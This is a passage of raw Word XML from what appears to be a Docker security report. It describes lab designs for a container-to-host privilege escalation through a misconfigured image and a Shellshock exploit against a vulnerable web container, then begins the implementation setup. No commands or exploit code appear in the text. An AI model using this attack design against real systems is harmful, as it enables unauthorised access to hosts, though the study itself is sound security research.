          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="004D5F81">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004D5F81">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00C915E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="004D5F81">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rivilege escalation </w:t>
      </w:r>
      <w:r w:rsidR="008D12E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>block</w:t>
      </w:r>
      <w:r w:rsidRPr="004D5F81">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> diagram.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w14:paraId="12A1A56E" w14:textId="6D4FD580" w:rsidR="0085202A" w:rsidRDefault="00140B25" w:rsidP="005E7CD4">
      <w:r>
        <w:t>On the other hand, t</w:t>
      </w:r>
      <w:r w:rsidR="00880D1F">
        <w:t>he</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> container to host approach design involves three containers with different setups and purposes to process and demonstrate the attack, as shown figure 12.</w:t>
      </w:r>
      <w:r w:rsidR="00600C96">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="00CE606F">
        <w:t>key objective</w:t>
      </w:r>
      <w:r w:rsidR="00600C96">
        <w:t xml:space="preserve"> of this attack is to access the victim machine, in this case, the </w:t>
      </w:r>
      <w:r w:rsidR="004E1FB6">
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00600C96">
        <w:t xml:space="preserve"> laptop, by exploiting the misconfigured Docker </w:t>
      </w:r>
      <w:r w:rsidR="003569AA">
        <w:t>image. The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> first two containers </w:t>
      </w:r>
      <w:r w:rsidR="00C915E6">
        <w:t xml:space="preserve">use very similar configurations, with the only difference is one supports SSH connection, and the other does </w:t>
      </w:r>
      <w:r w:rsidR="003569AA">
        <w:t>not. While the third container uses an image pulled from the Docker Hub and is based on Linux alpine distribution as it is lightweight and is used to install and run some packages</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="756492453"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="008D191C">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="008D191C">
            <w:instrText xml:space="preserve"> CITATION Alp21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="008D191C">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[84]</w:t>
          </w:r>
          <w:r w:rsidR="008D191C">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="003569AA">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00747BA3">
        <w:t xml:space="preserve"> In addition, vim </w:t>
      </w:r>
      <w:r w:rsidR="00B452D9">
        <w:t xml:space="preserve">software </w:t>
      </w:r>
      <w:r w:rsidR="0085202A">
        <w:t xml:space="preserve">is used as a </w:t>
      </w:r>
      <w:r w:rsidR="00747BA3">
        <w:t xml:space="preserve">text editor </w:t>
      </w:r>
      <w:r w:rsidR="00B452D9">
        <w:t>to write a script for the first two containers.</w:t>
      </w:r>
      <w:r w:rsidR="0085202A">
        <w:t xml:space="preserve"> The containers are also enabled to communicate through </w:t>
      </w:r>
      <w:r w:rsidR="00682E88">
        <w:t xml:space="preserve">the default Docker0 bridge using their default IP address. The complete network diagram of the </w:t>
      </w:r>
      <w:r w:rsidR="004453CF">
        <w:t>Docker environment is illustrated in figure 12</w:t>
      </w:r>
      <w:r w:rsidR="00A66424">
        <w:t>, designed on draw.io</w:t>
      </w:r>
      <w:r w:rsidR="004453CF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765E9417" w14:textId="35D3AEC0" w:rsidR="00747BA3" w:rsidRDefault="006E2DD4" w:rsidP="00747BA3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66B8C233" wp14:editId="3FEB5CE4">
            <wp:extent cx="4775200" cy="42862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5200" cy="4286250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E47D67D" w14:textId="08F47FBA" w:rsidR="008D191C" w:rsidRDefault="00747BA3" w:rsidP="00575F94">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="_Toc86858603"/>
      <w:r w:rsidRPr="00747BA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00747BA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00747BA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00747BA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidRPr="00747BA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00747BA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: network diagram of</w:t>
      </w:r>
      <w:r w:rsidR="001319A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the connected containers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p w14:paraId="74B4904C" w14:textId="03D5F445" w:rsidR="001319A3" w:rsidRPr="001319A3" w:rsidRDefault="00575F94" w:rsidP="001319A3">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00CE606F">
        <w:t>primary</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> purpose of the last attack is to examine Docker security using a vulnerable application downloaded from the Docker Hub repository. Th</w:t>
      </w:r>
      <w:r w:rsidR="00EB3DA1">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> application runs a simple webpage and is </w:t>
      </w:r>
      <w:r w:rsidR="00CE606F">
        <w:t>vulnerable to shellshock exploit</w:t>
      </w:r>
      <w:r w:rsidR="00EB3DA1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007D3F35">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D3F35" w:rsidRPr="00CE606F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Shellshock</w:t>
      </w:r>
      <w:r w:rsidR="007D3F35">
        <w:t xml:space="preserve"> is a Unix bash vulnerability </w:t>
      </w:r>
      <w:r w:rsidR="00CE606F">
        <w:t>that</w:t>
      </w:r>
      <w:r w:rsidR="007D3F35">
        <w:t xml:space="preserve"> allows an attacker to execute arbitrary commands either remotely or locally with high authority.</w:t>
      </w:r>
      <w:r w:rsidR="003C1FC6">
        <w:t xml:space="preserve"> It was first released on 24 September 2014 and is now publicly disclosed on the CVE database as </w:t>
      </w:r>
      <w:r w:rsidR="00A66424">
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidR="003C1FC6">
        <w:t>-2014-6271</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="483825861"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00C45CFA">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C45CFA">
            <w:instrText xml:space="preserve"> CITATION CMa15 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C45CFA">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[85]</w:t>
          </w:r>
          <w:r w:rsidR="00C45CFA">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="003C1FC6">
        <w:t>. Therefore, in this attack</w:t>
      </w:r>
      <w:r w:rsidR="00F97655">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003C1FC6">
        <w:t xml:space="preserve"> the container with the vulnerable application is the victim</w:t>
      </w:r>
      <w:r w:rsidR="00CE606F">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003C1FC6">
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:r w:rsidR="00F97655">
        <w:t xml:space="preserve">rest two are alpine containers pulled from the Docker Hub </w:t>
      </w:r>
      <w:r w:rsidR="00C45CFA">
        <w:t>used as hijackers. Figure 12 illustrates the block diagram with the three containers running on the Docker host.</w:t>
      </w:r>
      <w:r w:rsidR="00A66424">
        <w:t xml:space="preserve"> This attack uses Netcat to monitor the traffic flow between the container and the victim container</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="2097739229"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00381BE0">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00381BE0">
            <w:instrText xml:space="preserve"> CITATION JPe21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00381BE0">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[86]</w:t>
          </w:r>
          <w:r w:rsidR="00381BE0">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00A66424">
        <w:t xml:space="preserve">. It also utilises tools used </w:t>
      </w:r>
      <w:r w:rsidR="00A37DA2">
        <w:t>similar to</w:t>
      </w:r>
      <w:r w:rsidR="00A66424">
        <w:t xml:space="preserve"> the other two attacks, including Linux and Docker commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D202569" w14:textId="0CC46C5B" w:rsidR="004453CF" w:rsidRDefault="000D65AF" w:rsidP="001319A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F26354D" wp14:editId="02E85425">
            <wp:extent cx="4165600" cy="2566464"/>
            <wp:effectExtent l="0" t="0" r="635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86454" cy="2579312"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEF5100" w14:textId="414BCF25" w:rsidR="001319A3" w:rsidRDefault="001319A3" w:rsidP="001319A3">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="_Toc86858604"/>
      <w:r w:rsidRPr="001319A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="001319A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001319A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001319A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidRPr="001319A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001319A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Network topology with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="001319A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vulnerable application.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p w14:paraId="27763693" w14:textId="585C83A1" w:rsidR="003E3388" w:rsidRDefault="003E3388" w:rsidP="003E3388">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="_Toc86859293"/>
      <w:r>
        <w:t>IMPLEMENTATION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p w14:paraId="13514824" w14:textId="00871DE6" w:rsidR="00EA103B" w:rsidRDefault="00C94FFD" w:rsidP="003E3388">
      <w:r>
        <w:t xml:space="preserve">This section discusses the implementation process </w:t>
      </w:r>
      <w:r w:rsidR="00EB0128">
        <w:t xml:space="preserve">step by step </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">of each attack </w:t>
      </w:r>
      <w:r w:rsidR="00EB0128">
        <w:t>used. The author used a single laptop with Ubuntu release 20.04 and Docker version 20.10.7 installed to execute the attacks on the designed Docker ecosystem</w:t>
      </w:r>
      <w:r w:rsidR="003D1C2F">
        <w:t xml:space="preserve">, and they are the </w:t>
      </w:r>
      <w:r w:rsidR="00B2644B">
        <w:t>essential</w:t>
      </w:r>
      <w:r w:rsidR="003D1C2F">
        <w:t xml:space="preserve"> tools of this project.</w:t>
      </w:r>
      <w:r w:rsidR="00E4330F">
        <w:t xml:space="preserve"> Both the tools are installed with their latest version </w:t>
      </w:r>
      <w:r w:rsidR="00B2644B">
        <w:t xml:space="preserve">in order </w:t>
      </w:r>
      <w:r w:rsidR="00E4330F">
        <w:t>to examine and provide a clear picture of the current Docker security challenges.</w:t>
      </w:r>
      <w:r w:rsidR="00EA103B">
        <w:t xml:space="preserve"> Although the experiment uses a single </w:t>
      </w:r>
      <w:r w:rsidR="00BF09F9">
        <w:t>host</w:t>
      </w:r>
      <w:r w:rsidR="00EA103B">
        <w:t>, it is also possible to replicate the same attacks with multiple machines</w:t>
      </w:r>
      <w:r w:rsidR="00271AB0">
        <w:t xml:space="preserve"> connected via a network</w:t>
      </w:r>
      <w:r w:rsidR="00EA103B">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B854A9">
        <w:t xml:space="preserve"> First, the Ubuntu kernel version is verified, as shown in figure 14, and then</w:t>
      </w:r>
      <w:r w:rsidR="00BF09F9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B854A9">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00BF09F9">
        <w:t xml:space="preserve">he implementation process starts with installing and verifying </w:t>
      </w:r>
      <w:r w:rsidR="009A791A">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00BF09F9">
        <w:t>Docker engine on the Ubuntu laptop</w:t>
      </w:r>
      <w:r w:rsidR="009A791A">
        <w:t>, using the command shown in figure 1</w:t>
      </w:r>
      <w:r w:rsidR="00B854A9">
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="00181332">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5AD60A" w14:textId="66C87414" w:rsidR="00181332" w:rsidRDefault="00181332" w:rsidP="00181332">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5463EF2D" wp14:editId="18DB6352">
            <wp:extent cx="3124200" cy="1092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24200" cy="1092200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="331A1981" w14:textId="12D51A3F" w:rsidR="00181332" w:rsidRPr="00181332" w:rsidRDefault="00181332" w:rsidP="00181332">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="_Toc86858605"/>
      <w:r w:rsidRPr="00181332">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00181332">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00181332">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00181332">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r w:rsidRPr="00181332">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00181332">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Checking Ubuntu version.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p w14:paraId="3872DB52" w14:textId="45AC531C" w:rsidR="00181332" w:rsidRDefault="00181332" w:rsidP="00181332">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CD927BC" wp14:editId="4D418CEE">
            <wp:extent cx="4229100" cy="1682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9100" cy="1682750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFD3674" w14:textId="35F3B977" w:rsidR="00181332" w:rsidRDefault="00181332" w:rsidP="00181332">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="_Toc86858606"/>
      <w:r w:rsidRPr="00181332">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00181332">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00181332">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00181332">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
